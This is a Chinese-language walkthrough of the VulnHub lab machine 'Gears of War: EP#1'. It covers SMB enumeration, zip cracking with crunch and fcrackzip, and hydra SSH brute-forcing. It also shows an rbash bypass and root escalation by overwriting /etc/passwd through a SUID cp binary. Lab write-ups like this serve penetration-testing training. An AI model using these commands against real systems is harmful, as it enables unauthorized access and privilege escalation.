下载靶机
地址:Gears of War: EP#1 ~ VulnHub
问题阐述
使用virtualbox,kali和靶机均使用桥接网络
kali:192.168.1.213 靶机:192.168.1.
打靶目标
获取root权限
打靶过程
信息搜集
nmap扫描存活主机,并对存活主机做端口扫描
nmap -sP 192.168.1.1/24
nmap -sV -sC -p- 192.168.1.212
收集到的信息如下:80 web 服务 22 ssh 139 445 开放 samba 服务
测试 samba 安全
介绍:Samba是在Linux和UNIX系统上实现SMB协议的一个免费软件,由服务器及客户端程序构成。SMB(Server Messages Block,信息服务块)是一种在局域网上共享文件和打印机的一种通信协议,它为局域网内的不同计算机之间提供文件及打印机等资源的共享服务。SMB协议是客户机/服务器型协议,客户机通过该协议可以访问服务器上的共享文件系统、打印机及其他资源。通过设置“NetBIOS over TCP/IP”使得Samba不但能与局域网络主机分享资源,还能与全世界的电脑分享资源。(百度百科)
smbmap -H 192.168.1.212 //发现LOCUS_LAN$有读取权限
smbmap -H 192.168.1.212 -R LOCUS_LAN$ //递归读取LOCUS_LAN$文件夹
enum4linux 获取系统用户
enum4linux 192.168.1.212 -R | grep Local
枚举出三个用户:marcus、root、nobody
smbclient获取文件
smbclient //192.168.1.212/LOCAL_LAN$ //连接靶机的共享文件
ls //查看共享文件
#下载文件
get msg_horda.zip
get SOS.txt
查看文件
查看SOS.txt有提示,msg_horda.zip 文件需要密码 所以要用到上面 [@%%,]
crunch 生成密码字典
crunch 4 4 -t @%%, > list.txt //crunch生成4位数字典
//crunch -t 的命令如下
-t 指定模式
@ 插入小写字母
, 插入大写字母
% 插入数字
^ 插入特殊符号
fcrackzip 破解 zip
fcrackzip -D -u -p list.txt msg_horda.zip
输入密码解压文件之后发现有 key.txt,查看文件
翻译意思是:3_d4y 大概率就是这个靶机上的某用户的名字或者密码,由于压缩包解压之后得到的是key.txt,猜测这个应该是密码。
hydra -L /usr/share/wordlists/rockyou.txt -p 3_d4y ssh://192.168.1.212
这里查看爆破出的用户名其实就是前面发现的三个用户其中的一个
ssh连接靶机
绕过rbash :当存在目标靶机有rbash限制的时候可以选择noprofile方式进行登录
ssh marcus@192.168.1.212 -t "bash -noprofile"
特权提升
查找SUID文件
find / -type f -perm -u=s 2>/dev/null
发现了cp
,替换passwd文件实现提权即可
提取出靶机的passwd文件
cat /etc/passwd > /tmp/passwd
kali通过OpenSSL passwd生成一个新的用户hack,密码为hack
openssl passwd -1 -salt hack hack
编辑passwd文件,把第一行root的内容复制下来,然后修改一下
覆盖掉原来的passwd文件,即可提权成功
cp /tmp/passwd /etc/passwd